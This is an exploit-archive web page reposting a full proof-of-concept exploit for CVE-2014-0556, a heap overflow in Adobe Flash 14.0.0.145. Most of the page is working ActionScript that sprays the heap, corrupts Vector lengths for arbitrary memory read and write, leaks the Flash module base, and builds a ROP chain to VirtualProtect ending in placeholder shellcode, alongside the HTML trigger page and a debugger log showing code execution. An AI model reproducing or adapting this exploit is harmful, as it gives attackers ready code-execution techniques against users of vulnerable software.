首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Adobe Flash 14.0.0.145 copyPixelsToByteArray() Heap Overflow
来源:vfocus.net 作者:hdarwin 发布时间:2014-10-08  
/*
<html>
<head>
  <title>CVE-2014-0556</title>  
</head>
<body>
<object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br>
<button onclick="swf.exploit()">STOP</button>
</body>
</html>
*/
/*
(1728.eb0): Break instruction exception - code 80000003 (first chance)
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d63048 cc              int     3
1:020> dd esp l4
08d63048  cccccccc cccccccc cccccccc cccccccc
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d63049 cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304a cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304b cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304c cc              int     3
*/
package 
{
  import flash.events.*
  import flash.media.*
  import flash.display.*
  import flash.geom.*
  import flash.utils.*
  import flash.text.*
  import flash.external.ExternalInterface
  
  public class Main extends Sprite {
    private var i0:uint
    private var i1:uint
    private var i2:uint
    private var i3:uint
    private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145")
    private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)
    private var ob:Vector.<Object> = new Vector.<Object>(6400)
    private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)
    private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)
    private var snd:Sound
    private var vector:uint
    private var vtable:uint
    private var flash:uint
    public function Main():void {
  
      for (i0 = 0; i0 < 3200; i0++) {
        ba[i0] = new ByteArray()
        ba[i0].length = 0x2000
        ba[i0].position = 0xfffff000
      }
  
      for (i0 = 0; i0 < 3200; i0++) {
        if (i0 % 2 == 0) ba[i0] = null
        ob[i0 * 2] = new Vector.<uint>(1008)
        ob[i0 * 2 + 1] = new Vector.<uint>(1008)
      }
        
      bitmap.copyPixelsToByteArray(rect, ba[1601])
  
      for (i0 = 0; ; i0++)
        if (ob[i0].length != 1008) break
        
      ob[i0][1024 * 3 - 2] = 0xffffffff
  
      for (i1 = 0; ; i1++) {
        if (i0 == i1) continue
        if (ob[i1].length != 1008) break
      }
        
      ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff
      ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1]
      ob[i0].fixed = true
        
      for (i2 = 1000; ; i2++) {
        if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) {
            vector = ob[i1][0xFFFFFFFF - i2 + 11]
            break
        } else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) {
            vector = ob[i1][i2 + 11]
            break
        }
      }
        
      snd = new Sound()
        
      for (i2 = 0; i2 < 6400; i2++) {
        if (i2 == i0 || i2 == i1) continue
        ob[i2] = null
        ob[i2] = new Vector.<Object>(1014)
        ob[i2][0] = snd
        ob[i2][1] = snd
      }
        
      for (i2 = 0; ; i2++) {
        if (ob[i0][i2 + 0] == 1014 &&
          ob[i0][i2 + 1] == ob[i0][i2 + 2] &&
          ob[i0][i2 + 3] == 1
        ) {
          vtable = read(ob[i0][i2 + 1] - 1)
          flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx
          write(ob[i0][i2 + 1] - 1, vector + 0xf54)
          for (i3 = 0; i3 < 1008; i3++) {
            ob[i0][i3] = 0x41414100 | i3
          }
          ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN
          ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes
          ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN
          ob[i0][3] = 0x00000201 // 0x00000201
          ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN
          ob[i0][5] = 0x00000040 // 0x00000040
          ob[i0][6] = flash + 0x00691119 // POP ECX # RETN
          ob[i0][7] = vector + 2000 // Writable location
          ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN
          ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP)
          ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN
          ob[i0][11] = flash + 0x0000d83f // JMP [EAX]
          ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN
          ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect()
          ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN
          ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp'
          ob[i0][16] = 0xcccccccc // shellcode
          ob[i0][17] = 0xcccccccc // shellcode
          ob[i0][18] = 0xcccccccc // shellcode
          ob[i0][19] = 0xcccccccc // shellcode
          ob[i0][979] = flash + 0x0029913A // POP EAX # RETN
          ob[i0][980] = 0x00000f58
          ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN
          ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN
          ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN
          ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN
          break
        }
      }
        
      ob[i1][0xFFFFFFFE - 1024 * 3] = 4096
      ob[i0][1024 * 3 - 2] = 0
      str += flash.toString(16)
      var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf)
        
      if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit)
    }
          
    private function write(addr:uint, data:uint):void {
      ob[i0][(addr - vector) / 4 - 2] = data
    }
  
    private function read(addr:uint):uint {
      return ob[i0][(addr - vector) / 4 - 2]
    }
      
    private function zeroPad(number:String, width:int):String {
      if (number.length < width)
        return "0" + zeroPad(number, width-1)
      return number
    }
      
    public function exploit():void {
      snd.toString()
    }
  }
}
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Internet Explorer 8 - Fixed Co
·TeamSpeak Client 3.0.14 - Buff
·Microsoft Exchange IIS HTTP In
·Ultra Electronics SSL VPN 7.2.
·bash代码注入的安全漏洞
·XAMPP 1.8.x Multiple Vulnerabi
·Dhclient Bash Environment Vari
·Asx to Mp3 2.7.5 - Stack Overf
·Gnu Bash 4.3 CGI REFERER Comma
·ManageEngine OpManager / Socia
·Gnu Bash 4.3 CGI Scan Remote C
·HP Network Node Manager I PMD
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved